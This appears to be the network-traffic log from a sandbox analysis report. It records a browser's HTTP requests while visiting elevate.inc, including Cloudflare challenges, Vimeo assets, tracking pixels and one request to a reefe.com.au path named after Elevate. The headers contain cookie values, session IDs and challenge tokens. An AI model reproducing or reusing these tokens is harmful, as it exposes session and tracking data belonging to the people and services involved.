                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/s2r7g/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/ HTTP/1.1host: challenges.cloudflare.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
                    Source: global trafficHTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749241150977&li_adsId=a08736dc-d6cd-4b46-aa03-d86286a7d437&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&tm=gtmv2&cookiesTest=true&liSync=true HTTP/1.1host: px.ads.linkedin.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=3a8b9217-ce66-41df-94c7-7440f4b97bfacookie: bcookie="v=2&3a49c610-16af-4c0a-8608-313dc2621c41"cookie: lidc="b=OGST09:s=O:r=O:a=O:p=O:g=3157:u=1:x=1:i=1749241152:t=1749327552:v=2:sig=AQFt46LKeqKES_d0Z3o31AclRsUvEkds"cookie: UserMatchHistory=AQIDWPUJWcQGmQAAAZdG5caOPHun81XZ91g4sKFME-9i67gzYmhSg8joNAkHViRz67tLgBvjUilZ8Acookie: AnalyticsSyncHistory=AQIxe5FOTWY5JQAAAZdG5caOIzhkp0FBBqpdt2yzf6DGXtKpgXt2IAnGoGQr4ZQ6ecPdcXasWEesmMj_M9tEBwcookie: ar_debug=1priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/s2r7g/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=94ba9a7ada60e766&lang=auto HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/s2r7g/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94ba9a6f4b2ee766/1749241152768/lccHHkCI_66WFg8 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/00zbo/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94ba9a6f4b2ee766/1749241152768/lccHHkCI_66WFg8 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/658c478180fccf87132d4798_elevate%20-%20favicon.png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/658c478180fccf87132d4798_elevate%20-%20favicon.png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /ab/elevateinc/check/images/net_big.d-52893f5e.png HTTP/1.1Host: reefe.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=2850574025&v=1.1&a=19524073&rcu=https%3A%2F%2Fwww.elevate.inc%2Four-story&pu=https%3A%2F%2Fwww.elevate.inc%2Four-story&t=Trailblazing+a+better+future+for+benefits+%7C+Our+Story&cts=1749241153038&vi=d62c2de99dc303d6db31088eb1e9cb37&nc=true&u=761582.d62c2de99dc303d6db31088eb1e9cb37.1749241153034.1749241153034.1749241153034.1&b=761582.1.1749241153035&cc=15 HTTP/1.1host: track.hubspot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1host: c.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/840964214:1749238384:TZZDOJHiZT91ZCimd2RutkjFJ8IP1xABKE0_6LRmDmY/94ba9a757aa9e766/P3oN4I5C2rFytQetrcROAh7TrdcIPbeGBKP8Rz1t6Ls-1749241152-1.2.1.1-KqZ0sZ8b1qe4Hcn5TJQpj36ZPryfcbQK6SyM7xkd3QHMT6qBBSQOTV4AAgpxlUMk HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2 HTTP/1.1host: cdnjs.cloudflare.comorigin: https://reefe.com.ausec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://reefe.com.au/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
                    Source: global trafficHTTP traffic detected: GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=2850574025&v=1.1&a=19524073&rcu=https%3A%2F%2Fwww.elevate.inc%2Four-story&pu=https%3A%2F%2Fwww.elevate.inc%2Four-story&t=Trailblazing+a+better+future+for+benefits+%7C+Our+Story&cts=1749241153038&vi=d62c2de99dc303d6db31088eb1e9cb37&nc=true&u=761582.d62c2de99dc303d6db31088eb1e9cb37.1749241153034.1749241153034.1749241153034.1&b=761582.1.1749241153035&cc=15 HTTP/1.1host: track.hubspot.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: __cf_bm=W7g6iOrwxJil5kqFGLOpYofFOjvdTR1kJ48ky8FdoRg-1749241154-1.0.1.1-vxr3sVoVQuFSa8vOVOD0JVEmDINIUOcF1pkV62kykogjs0gNIyz8Wfsu1IrPTX8kDo_jPDsDfWXbkDAgpU17rzkz9uMwrUOp8z1xgCUwfCwcookie: _cfuvid=5px.G6APZu3wiJklCfSMapqeXqEHjF9Zs36x1ekxwgE-1749241154950-0.0.1.1-604800000priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=C8D45CA58B9942D6B9153B2E5DF8667D&RedC=c.clarity.ms&MXFR=25B2EF041D346F6B0AF1F907193461F9 HTTP/1.1host: c.bing.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/94ba9a6f4b2ee766/1749241152773/13553d9792bde6991f66f67d203ec56a3594f84889c37e5cc89d890bcfcd1282/ylxpYA_6LxSvyzP HTTP/1.1host: challenges.cloudflare.comcache-control: max-age=0sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/00zbo/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=C8D45CA58B9942D6B9153B2E5DF8667D&MUID=29CA121D580C65D20C8D041E595B6449 HTTP/1.1host: c.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: SM=Tcookie: MUID=25B2EF041D346F6B0AF1F907193461F9priority: i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/505054221:1749238293:ZSeA3VWMnk2yzv9dwNf9DewbVIDX2hMsQGlyau8xSvo/94ba9a7ada60e766/xySYggtSxDK_M3NG2.k.FmYY4wZKih9uq8l_Pjmy2UI-1749241153-1.2.1.1-n1ixfZm21mFISo4yrg5M1GPGemzeBGwPkl90cS25ZW23.eLfBgdMLyGlnur1_Qyq HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=C8D45CA58B9942D6B9153B2E5DF8667D&MUID=29CA121D580C65D20C8D041E595B6449 HTTP/1.1host: c.clarity.msuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: SM=Ccookie: MUID=29CA121D580C65D20C8D041E595B6449cookie: MR=0cookie: ANONCHK=0priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/94ba9a7ada60e766/1749241155970/5c2678bc97d2c01226e2a07498647a9b0ab3e44a5f6ebd6ead5f3655ef19becb/BBJ-0bbqlDURKVn HTTP/1.1host: challenges.cloudflare.comcache-control: max-age=0sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/s2r7g/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Pc9yRwXsuKwAvOr&MD=xDHHawBU HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1001588542:1749238352:KKQGD2uGDKVNRdJ-odTxPeg7RnptWuv-xrNA5Wi_1YU/94ba9a6f4b2ee766/DsQev4EtRF94K4j7IwqqLwUcBgGU0sKjVfYfjWlh55w-1749241151-1.2.1.1-f0zQPsw4CCEfYh0ihLOiG0nXJl7lNEccHE04UVD1iJDghe7GPBHkHID_2jqpLPYI HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94ba9a757aa9e766/1749241155048/M9CEC_nI8Kg1ymn HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/jyths/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94ba9a757aa9e766/1749241155048/M9CEC_nI8Kg1ymn HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94ba9a7ada60e766/1749241155975/H4t5gMsB-Q9llnn HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/s2r7g/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94ba9a7ada60e766/1749241155975/H4t5gMsB-Q9llnn HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/94ba9a757aa9e766/1749241155051/2eb9c31968d701298e8accbf1cd53c4c1ddc7e6643a9194312f837dee466cd51/xuaE5HDGo36Nj6D HTTP/1.1host: challenges.cloudflare.comcache-control: max-age=0sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/jyths/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/840964214:1749238384:TZZDOJHiZT91ZCimd2RutkjFJ8IP1xABKE0_6LRmDmY/94ba9a757aa9e766/P3oN4I5C2rFytQetrcROAh7TrdcIPbeGBKP8Rz1t6Ls-1749241152-1.2.1.1-KqZ0sZ8b1qe4Hcn5TJQpj36ZPryfcbQK6SyM7xkd3QHMT6qBBSQOTV4AAgpxlUMk HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /video/901646435?app_id=122963&referrer=https%3A%2F%2Fwww.elevate.inc%2F&turnstile=0.OhkHg83PS9R0R0UjVA2-5JX8r3uoACIsjD68bzXvaF_9ejATAlO413akZsmI6UGsoY4qOA0jXlWggwzuqeA9usuz5_HH-MAx_k0TlgbWwvjkkzMDcNShXVhOda213mu7eHOE3fETOVGVKUhowkET233pU_8CtzMMsH0sz7SYHmxY9EqhqmodqpyDqgBmkdNXOITmRhbDd_7oWYJKuQnmn_msEFOu2bYZkU8eNtW4FvPvypm5Oyotcfj5YtEYTzfYT0g0xkvjZ_VaDPrZbB5KPEofk6UskLkU2ROyqYIlNeN1aIS1V0lyCQbMq6wDUQDUskvTnIDz-xjaXx_X8VyhLN1sdghmloL986U159usTGjIftqM29uxGAousqzdcKHBWciHkk_i3sPVMy27UA7AEQtanjO4oKs6aeMD_L71D6ZOk9em0q451-IH-DbMWQlmZg1LshUvtANxOSDzkM-sBFvwPmIUut3akU-0v35W2he49uzkniG0332c1etnDH3Zxw_Qzw-zRno_nhCPiVX6BlZ_ifhHdd2UeuaBlRVlhN9cATIdnV_cfbirJmEQrfCYFF5rYB-a3k5Fcaw277Esg-pVeyfrMO33M8wn_qT4CTZPCoFY1d_IOYEMlv1tAaXatCOntig8Y80CcHzVfWcq0e98ZbmARXZmm4QjYmeOCK-DgfHWhT0YRu5owgygMgNKAnlurwlxQ6Z79JMP1SFA-nQoGL524sMQMhuOAzxP0CzEc2EClFGf9loUPs-Y7st7-pLmSMmzeAGCaJXiP2zzL8mVFoI6kZWKwnttzVPSrWvPm3gPlOPxWrRTXD1mo2U0SRZHm4r6qeYk_VLsnmFDw4GVPNpjZYM1YyLNVuYSDr8.JMf3OzSGWjkhizQK6lcPyA.77fd18c6ab161ad91a02a88da6a60c140d518a8f1b9498d5a45bcbeb8e458db7&ref=https%253A%252F%252Fcdn.embedly.com%252F HTTP/1.1Host: player.vimeo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,
                    Source: global trafficHTTP traffic detected: GET /video/1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d?mw=80&q=85 HTTP/1.1host: i.vimeocdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /p/4.40.69/css/player.css HTTP/1.1host: f.vimeocdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
                    Source: global trafficHTTP traffic detected: GET /p/4.40.69/js/vendor.module.js HTTP/1.1host: f.vimeocdn.comorigin: https://player.vimeo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
                    Source: global trafficHTTP traffic detected: GET /p/4.40.69/js/player.module.js HTTP/1.1host: f.vimeocdn.comorigin: https://player.vimeo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
                    Source: global trafficHTTP traffic detected: GET /js_opt/modules/utils/vuid.min.js HTTP/1.1host: f.vimeocdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
